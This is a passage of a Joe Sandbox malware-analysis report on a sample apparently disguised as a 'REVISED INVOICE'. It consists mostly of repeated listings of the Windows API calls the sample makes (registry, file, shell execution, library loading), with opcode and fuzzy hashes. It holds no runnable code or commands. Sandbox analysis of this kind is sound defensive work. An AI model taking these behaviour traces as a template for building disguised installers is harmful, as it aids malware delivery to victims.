                                                                                                • Associated: 00000000.00000002.378271848.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.378271848.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.378271848.0000000000462000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.378511911.0000000000466000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_REVISED INVOICE.jbxd
                                                                                                Similarity
                                                                                                • API ID: ExecuteShell
                                                                                                • String ID: C:\Users\user\AppData\Local\fona\Kvit
                                                                                                • API String ID: 587946157-989027284
                                                                                                • Opcode ID: 53b506568bb0721b107c84be0b2c3bfad465a6700b1750e117177fae49c69c36
                                                                                                • Instruction ID: aff1eb953233667cd0d8f0d555c0d854947fdecc0d20a4db35d539c6ca29440d
                                                                                                • Opcode Fuzzy Hash: 53b506568bb0721b107c84be0b2c3bfad465a6700b1750e117177fae49c69c36
                                                                                                • Instruction Fuzzy Hash: FAF0F636B04100AACF116FB9DD4AEAD33B9AB44724F240577F801F74D6D6FDC9419618
                                                                                                APIs
                                                                                                  • Part of subcall function 00402CC9: RegOpenKeyExW.KERNEL32 ref: 00402CF1
                                                                                                • RegQueryValueExW.ADVAPI32(00000000,00000000,?,?,?,?), ref: 0040245B
                                                                                                • RegCloseKey.KERNEL32(?), ref: 004024F6
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.378257129.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.378189875.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.378263490.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.378271848.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.378271848.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.378271848.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.378271848.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.378271848.0000000000462000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.378511911.0000000000466000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_REVISED INVOICE.jbxd
                                                                                                Similarity
                                                                                                • API ID: CloseOpenQueryValue
                                                                                                • String ID:
                                                                                                • API String ID: 3677997916-0
                                                                                                • Opcode ID: f026fbabf7f86d2756df4ea0d93cbbb84a06aa25cae6380f5d54e0d841482863
                                                                                                • Instruction ID: 318f25c97078b56e75ac6278506f01b5a34a300aa28fb7ae5d2085b0d3939190
                                                                                                • Opcode Fuzzy Hash: f026fbabf7f86d2756df4ea0d93cbbb84a06aa25cae6380f5d54e0d841482863
                                                                                                • Instruction Fuzzy Hash: F7117331915205EFDB14CFA4DA489BEB7B4EF44354F20843FE405B72D0D6B85A41DB5A
                                                                                                APIs
                                                                                                • MulDiv.KERNEL32 ref: 004013E4
                                                                                                • SendMessageW.USER32(?,00000402,00000000), ref: 004013F4
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.378257129.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.378189875.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.378263490.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.378271848.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.378271848.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.378271848.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.378271848.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.378271848.0000000000462000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.378511911.0000000000466000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_REVISED INVOICE.jbxd
                                                                                                Similarity
                                                                                                • API ID: MessageSend
                                                                                                • String ID:
                                                                                                • API String ID: 3850602802-0
                                                                                                • Opcode ID: 1f472dfcc894d90b0504cb8d955b7f6dcf6f20f1f7a064cd725307f95b817da4
                                                                                                • Instruction ID: 1e7952006d9e226a8eb598a62733b1cad305e59e596fc6f41a9a7203fe322f79
                                                                                                • Opcode Fuzzy Hash: 1f472dfcc894d90b0504cb8d955b7f6dcf6f20f1f7a064cd725307f95b817da4
                                                                                                • Instruction Fuzzy Hash: 9401D131B24210EBE7295B389C05B6A3698E720318F10867EB915F62F1DA78DC028B5D
                                                                                                APIs
                                                                                                  • Part of subcall function 00402CC9: RegOpenKeyExW.KERNEL32 ref: 00402CF1
                                                                                                • RegDeleteValueW.ADVAPI32 ref: 0040233E
                                                                                                • RegCloseKey.ADVAPI32(00000000), ref: 00402347
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.378257129.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.378189875.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.378263490.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.378271848.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.378271848.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.378271848.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.378271848.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.378271848.0000000000462000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.378511911.0000000000466000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_REVISED INVOICE.jbxd
                                                                                                Similarity
                                                                                                • API ID: CloseDeleteOpenValue
                                                                                                • String ID:
                                                                                                • API String ID: 849931509-0
                                                                                                • Opcode ID: 8e3681582159ec65c89f975355e1fd8591e9d0419328831ddadaf4847592866c
                                                                                                • Instruction ID: 78bc400ea2c38a342dc409f04ff34772de2348df94907e049583a87c4894aa7b
                                                                                                • Opcode Fuzzy Hash: 8e3681582159ec65c89f975355e1fd8591e9d0419328831ddadaf4847592866c
                                                                                                • Instruction Fuzzy Hash: F2F0AF33A04100ABEB10BFB48A4EABE72699B40314F14843BF501B71D1C9FC9D025629
                                                                                                APIs
                                                                                                • GetModuleHandleA.KERNEL32(?,?,00000020,004032D6,00000009,SETUPAPI,USERENV,UXTHEME), ref: 00406407
                                                                                                • GetProcAddress.KERNEL32(00000000,?,?,00000020,004032D6,00000009,SETUPAPI,USERENV,UXTHEME), ref: 00406422
                                                                                                  • Part of subcall function 00406389: GetSystemDirectoryW.KERNEL32(?,00000104,00000020), ref: 004063A0
                                                                                                  • Part of subcall function 00406389: wsprintfW.USER32 ref: 004063DB
                                                                                                  • Part of subcall function 00406389: LoadLibraryW.KERNEL32(?), ref: 004063EB
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.378257129.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.378189875.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.378263490.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.378271848.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.378271848.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.378271848.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.378271848.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.378271848.0000000000462000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.378511911.0000000000466000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_REVISED INVOICE.jbxd
                                                                                                Similarity
                                                                                                • API ID: AddressDirectoryHandleLibraryLoadModuleProcSystemwsprintf
                                                                                                • String ID:
                                                                                                • API String ID: 2547128583-0
                                                                                                • Opcode ID: d7ac541ed48af1eacb80342b8b251201fb822529d60d72dade8e8733a6d6c095
                                                                                                • Instruction ID: a9e24e321ddd3f073a9e6a165911cd393abac726806fbc755e3780b1e63cb1a6
                                                                                                • Opcode Fuzzy Hash: d7ac541ed48af1eacb80342b8b251201fb822529d60d72dade8e8733a6d6c095
                                                                                                • Instruction Fuzzy Hash: A7E086326082216BD31157745D4493B67A89BD5740306083EFD06F6181D734AC2296AD
                                                                                                APIs
                                                                                                • ShowWindow.USER32(00000000,00000000), ref: 00401DF2
                                                                                                • EnableWindow.USER32(00000000,00000000), ref: 00401DFD
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.378257129.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.378189875.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.378263490.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.378271848.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.378271848.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.378271848.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.378271848.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.378271848.0000000000462000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.378511911.0000000000466000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_REVISED INVOICE.jbxd
                                                                                                Similarity
                                                                                                • API ID: Window$EnableShow
                                                                                                • String ID:
                                                                                                • API String ID: 1136574915-0
                                                                                                • Opcode ID: cfaea7fd3bda894a56d153d41461a9d4176acae281daef1a5174918f82bdf125
                                                                                                • Instruction ID: c4cc9d8bc17b60f52f9d6b5ec52db5efc6ce13511ecacb80f957bec5d45ae41a
                                                                                                • Opcode Fuzzy Hash: cfaea7fd3bda894a56d153d41461a9d4176acae281daef1a5174918f82bdf125
                                                                                                • Instruction Fuzzy Hash: 69E08C32A04100ABC720AFB5AE8999E3375EF50369B10047BE402F10E1C6BCAC408A6E
                                                                                                APIs
                                                                                                • GetFileAttributesW.KERNELBASE(00000003,00402E2E,00437800,80000000,00000003,?,?,00000000,00403504,?), ref: 00405BF8
                                                                                                • CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405C1A
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.378257129.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.378189875.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.378263490.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.378271848.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.378271848.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.378271848.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.378271848.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.378271848.0000000000462000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.378511911.0000000000466000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_REVISED INVOICE.jbxd
                                                                                                Similarity
                                                                                                • API ID: File$AttributesCreate
                                                                                                • String ID:
                                                                                                • API String ID: 415043291-0
                                                                                                • Opcode ID: 742792ff7842fdd919adb4f35d156b5e8b6622b1384091bd21e9a064bfd9155a
                                                                                                • Instruction ID: be88a92cb82447fd1599dbd49a9896cb6db060ceaa3ec03b2970cb079924df1d
                                                                                                • Opcode Fuzzy Hash: 742792ff7842fdd919adb4f35d156b5e8b6622b1384091bd21e9a064bfd9155a
                                                                                                • Instruction Fuzzy Hash: FDD09E71658201AFEF098F20DE16F2E7AA2EB84B00F10562CB642940E0D6B15815DB16
                                                                                                APIs
                                                                                                • GetFileAttributesW.KERNELBASE(?,?,004057D4,?,?,00000000,004059AA,?,?,?,?), ref: 00405BD4
                                                                                                • SetFileAttributesW.KERNEL32(?,00000000), ref: 00405BE8
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.378257129.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.378189875.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.378263490.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.378271848.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.378271848.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.378271848.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.378271848.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.378271848.0000000000462000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.378511911.0000000000466000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_REVISED INVOICE.jbxd
                                                                                                Similarity
                                                                                                • API ID: AttributesFile
                                                                                                • String ID:
                                                                                                • API String ID: 3188754299-0
                                                                                                • Opcode ID: 12e66bcdd04e2879fdb80b2c332070aab0449f7c07d3bd30d589cafb4efe0379
                                                                                                • Instruction ID: bdf799deba5259ae40da9bf86cf5b70a116480e13bafc777f783197d388d6591
                                                                                                • Opcode Fuzzy Hash: 12e66bcdd04e2879fdb80b2c332070aab0449f7c07d3bd30d589cafb4efe0379
                                                                                                • Instruction Fuzzy Hash: 7BD01272909521AFC6102738EE0C89BBFA5EB54371B054B31F979E22F0C7305C52CA95
                                                                                                APIs
                                                                                                • CreateDirectoryW.KERNELBASE(?,00000000,0040325D,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403496), ref: 004056D0
                                                                                                • GetLastError.KERNEL32 ref: 004056DE
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.378257129.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.378189875.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.378263490.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.378271848.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.378271848.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.378271848.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.378271848.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.378271848.0000000000462000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.378511911.0000000000466000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_REVISED INVOICE.jbxd
                                                                                                Similarity
                                                                                                • API ID: CreateDirectoryErrorLast
                                                                                                • String ID:
                                                                                                • API String ID: 1375471231-0
                                                                                                • Opcode ID: d8dd424ede50ccfac4b7523ad15fca3fe61b3a2743ebd4ec855a49df1000c641
                                                                                                • Instruction ID: d706e5ae47c7ee36432b9320fd90c1f42ce8b6abbc3a43a90ad219fc8104f268
                                                                                                • Opcode Fuzzy Hash: d8dd424ede50ccfac4b7523ad15fca3fe61b3a2743ebd4ec855a49df1000c641
                                                                                                • Instruction Fuzzy Hash: 5DC04C30A19602DBDA105B31DD0871B7954AB50742F60CD36610AE51A0DA769811DD3E
                                                                                                APIs
                                                                                                • WritePrivateProfileStringW.KERNEL32 ref: 004022D4
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.378257129.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.378189875.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.378263490.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.378271848.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.378271848.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.378271848.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.378271848.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.378271848.0000000000462000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.378511911.0000000000466000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_REVISED INVOICE.jbxd
                                                                                                Similarity
                                                                                                • API ID: PrivateProfileStringWrite
                                                                                                • String ID:
                                                                                                • API String ID: 390214022-0
                                                                                                • Opcode ID: 0286e3c2219f2336aac24a8adfc5af7a950c5186903a8fadcfb356e78ce5c9c9
                                                                                                • Instruction ID: 900e0ed31166daec82b0b067df29ce1ac5916d1a5491b2584b310d9ae4f56f06
                                                                                                • Opcode Fuzzy Hash: 0286e3c2219f2336aac24a8adfc5af7a950c5186903a8fadcfb356e78ce5c9c9
                                                                                                • Instruction Fuzzy Hash: 5BE04F319001246ADB113EF10E8ED7F31695B40314B1405BFB511B66C6D5FC1D4146A9
                                                                                                APIs
                                                                                                • ReadFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000), ref: 00405C8B
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.378257129.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.378189875.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.378263490.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.378271848.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.378271848.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.378271848.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.378271848.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.378271848.0000000000462000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.378511911.0000000000466000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_REVISED INVOICE.jbxd
                                                                                                Similarity
                                                                                                • API ID: FileRead
                                                                                                • String ID:
                                                                                                • API String ID: 2738559852-0
                                                                                                • Opcode ID: 706c1f52c55adc451273f1d2a5d46862a6587a7fe095f8bbabcbc32b8b015297
                                                                                                • Instruction ID: b406f17295b0c4e2c80a39b4892fee2aa768816fba0af151b3e099c9f54450aa
                                                                                                • Opcode Fuzzy Hash: 706c1f52c55adc451273f1d2a5d46862a6587a7fe095f8bbabcbc32b8b015297
                                                                                                • Instruction Fuzzy Hash: 3BE08632114259ABDF119E508C04EEB3B5CEB04350F004436F911E3180D230E9209BA4
                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.378257129.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.378189875.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.378263490.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.378271848.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.378271848.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.378271848.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.378271848.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.378271848.0000000000462000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.378511911.0000000000466000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_REVISED INVOICE.jbxd
                                                                                                Similarity
                                                                                                • API ID: Open
                                                                                                • String ID:
                                                                                                • API String ID: 71445658-0
                                                                                                • Opcode ID: dee534fb00c3da35f42930a873cbe089bc3ca12b7b75b89d27cc42400959d1ef
                                                                                                • Instruction ID: 68f4dbfd07ce8b2f927ba9c023ef299b46c4db6be22e7618382101f0868acce4
                                                                                                • Opcode Fuzzy Hash: dee534fb00c3da35f42930a873cbe089bc3ca12b7b75b89d27cc42400959d1ef
                                                                                                • Instruction Fuzzy Hash: CCE04F76254108BADB00DFA4DD46EA577ECAB04700F004421BA08D60A1C674E5408768
                                                                                                APIs
                                                                                                • WriteFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000), ref: 00405CBA
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.378257129.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.378189875.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.378263490.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.378271848.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.378271848.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.378271848.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.378271848.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.378271848.0000000000462000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.378511911.0000000000466000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_REVISED INVOICE.jbxd
                                                                                                Similarity
                                                                                                • API ID: FileWrite
                                                                                                • String ID:
                                                                                                • API String ID: 3934441357-0
                                                                                                • Opcode ID: 00c0377323aa53eb430c82b83f01e62a2601c7c92c94a0140a128221a0f71a88
                                                                                                • Instruction ID: 8766ac6266e8b07294e6d952513c2b0c694ccf73d68c0bd44325f5ff4784c02c
                                                                                                • Opcode Fuzzy Hash: 00c0377323aa53eb430c82b83f01e62a2601c7c92c94a0140a128221a0f71a88
                                                                                                • Instruction Fuzzy Hash: D4E08C3222835AABEF119E548C00EEB3B6CEB01360F004833F915E3190E231E9209BA8
                                                                                                APIs
                                                                                                • SetFileAttributesW.KERNELBASE(00000000,?,000000F0), ref: 004015A6
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.378257129.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.378189875.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.378263490.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.378271848.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.378271848.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.378271848.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.378271848.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.378271848.0000000000462000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.378511911.0000000000466000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_REVISED INVOICE.jbxd
                                                                                                Similarity
                                                                                                • API ID: AttributesFile
                                                                                                • String ID:
                                                                                                • API String ID: 3188754299-0
                                                                                                • Opcode ID: d7ccf2efa293c4f4e7941938c17de90b49bebcb5e5f94d629c963492a0773b33
                                                                                                • Instruction ID: 1b5af1e6617a4a9cd807fc22027cae36a39ca3b3e6b8606dbe65da2ef404c620
                                                                                                • Opcode Fuzzy Hash: d7ccf2efa293c4f4e7941938c17de90b49bebcb5e5f94d629c963492a0773b33
                                                                                                • Instruction Fuzzy Hash: 41D01233B04100DBCB10DFA89A0869D77659B40334B208677D501F21E5D6B9C5515A19
                                                                                                APIs
                                                                                                • SendMessageW.USER32(?,00000000,00000000,00000000), ref: 00404141
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.378257129.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.378189875.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.378263490.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.378271848.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.378271848.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.378271848.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.378271848.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.378271848.0000000000462000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.378511911.0000000000466000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_REVISED INVOICE.jbxd
                                                                                                Similarity
                                                                                                • API ID: MessageSend
                                                                                                • String ID:
                                                                                                • API String ID: 3850602802-0
                                                                                                • Opcode ID: c20ba2f4b44bb730ed9beb80e31de2705d99c650012490af2887c79ee983c6a6
                                                                                                • Instruction ID: 1f6dcfa326d5252f97bf96967583e82957cdc04532489552bbed9deb9ca34131
                                                                                                • Opcode Fuzzy Hash: c20ba2f4b44bb730ed9beb80e31de2705d99c650012490af2887c79ee983c6a6
                                                                                                • Instruction Fuzzy Hash: 26C09B757443017BDA318F509D49F27775867A4700F2544397350F70D0C774E451D61D
                                                                                                APIs
                                                                                                • SendMessageW.USER32(00000028,?,00000001,00403F44), ref: 00404126
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.378257129.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.378189875.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.378263490.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
